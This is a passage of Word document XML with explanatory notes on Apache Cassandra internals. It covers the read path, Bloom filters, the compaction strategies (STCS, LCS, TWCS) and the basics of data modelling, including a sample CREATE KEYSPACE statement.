        <w:t xml:space="preserve">    Compressed chunk boundaries (data is compressed in chunks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E4FAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="13834EC1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Read path (how Cassandra assembles a query result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7110B7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1. Check row cache (if enabled) — if hit, return immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B04B7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  2. Check memtable — most recent writes for this partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191097DB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  3. Check SSTables from newest to oldest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E68F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     a. Check Bloom filter — "might key X be in this SSTable?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D1B8D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        If definitely absent: skip this SSTable (save a disk read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186D1ED" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     b. Check partition index summary → approximate position in index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C306BE9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     c. Check partition index → exact byte offset in data file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A871F5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     d. Read data from data file at that offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31289334" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  4. Merge results: reconcile multiple versions of same column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA40B80" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     Apply tombstones (deletion markers) to remove deleted data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A36FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  5. Return merged result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC9419" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA7D84" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Read amplification: potentially reads from all SSTables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E034D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bloom filter reduces this dramatically (1% FPR = 99% of irrelevant SSTables skipped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58116C59" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compaction — the critical background process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F768832" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153B549" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Why compaction is necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335EAA88" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Writes create many small SSTables over time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0E45E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Same partition key exists in multiple SSTables (newer overwrites older)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005D67E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Tombstones (deletions) accumulate across SSTables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0292A4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC06297" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Without compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92F980" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Read must check many SSTables → high read amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A5147" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Tombstones never cleaned up → deleted data still occupies disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D1053" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Many small files → file system overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7F9A0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F02ED1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Compaction strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E40CA8A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="76A6ECF5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>STCS (Size-Tiered Compaction Strategy) — default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD65F1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Groups SSTables of similar size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549CC0F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  When 4+ SSTables of similar size exist: merge them into one larger SSTable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3ABA9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD2366" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Tiers (approximate):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343D1F5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Tier 1: ~10MB SSTables (4 min → merge into 40MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA4592" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Tier 2: ~40MB SSTables (4 min → merge into 160MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABDA44" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Tier 3: ~160MB SSTables (4 min → merge into 640MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE14695" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035DA0D8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Good for: write-heavy workloads (few reads to optimize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0225C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bad for: read-heavy (too many SSTables to check per read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62FD7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bad for: delete-heavy (tombstones persist until matching SSTable is large)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA364A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73581B26" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>LEVELED Compaction Strategy (LCS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16167685" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  L0: fresh small SSTables (any size, unlimited count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD8D93" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  L1: compacted SSTables, 10MB each, no partition key overlaps, target size 160MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD489F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  L2: 10× L1 size (1.6GB), no partition key overlaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697DE4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  L3: 10× L2 size (16GB), no partition key overlaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37B79D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538BF01B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Within each level: no two SSTables contain the same partition key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A870F34" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Read requires checking at most 1 SSTable per level (no overlap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F1E19" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Read amplification: O(number of levels) instead of O(number of SSTables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12879C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E96668" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Good for: read-heavy workloads, predictable read performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A6B7D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bad for: write-heavy (more compaction work — writes at every level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA6DBB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0782C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Write amplification: higher than STCS (data written many times across levels)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F16A4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Read amplification: lower than STCS (at most 1 SSTable per level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C43F36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9C5D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>TWCS (Time Window Compaction Strategy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7D764" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Designed specifically for time-series data in Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F1510" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Creates one SSTable per time window (e.g., per hour, per day)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5417B27F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C278802" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Active window: accepts writes, STCS within window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03996E5A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Closed window: immutable, one SSTable per window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B19F6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008FACBE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Retention + TWCS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E2953F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    DELETE data older than 30 days → one DROP SSTABLE operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69844968" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Much more efficient than row-level deletes with tombstones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130116FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB3E1A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Good for: time-series, append-only data, TTL-based retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA37A6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bad for: workloads with updates/deletes within the time window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865AABA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Data Model — Designing for Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F539016" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most important Cassandra principle: design tables for queries, not for normalization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CB9932" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C10115" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra data model components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B536E73" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="2AC11A3B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Keyspace: top-level namespace (like a database/schema)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1804DA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replication configuration: RF=3 means 3 copies of each partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EFA9C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60FD39" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE KEYSPACE ecommerce WITH replication = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DF69A5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    'class': 'NetworkTopologyStrategy',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE4B52F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    'us-east-1': 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6407A889" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    'eu-west-1': 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D96F28" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A0DC5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F4044" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">Table: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68915AB9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PRIMARY KEY = (partition_key) [, clustering_key_1, clustering_key_2, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B526C4F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411EB44" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Partition key: determines which node(s) own this data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7B5E02" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    hash(partition_key) → token → node responsible for that token range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD21F16" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    All rows with the same partition key are on the same node</w:t>
      </w:r>
    </w:p>
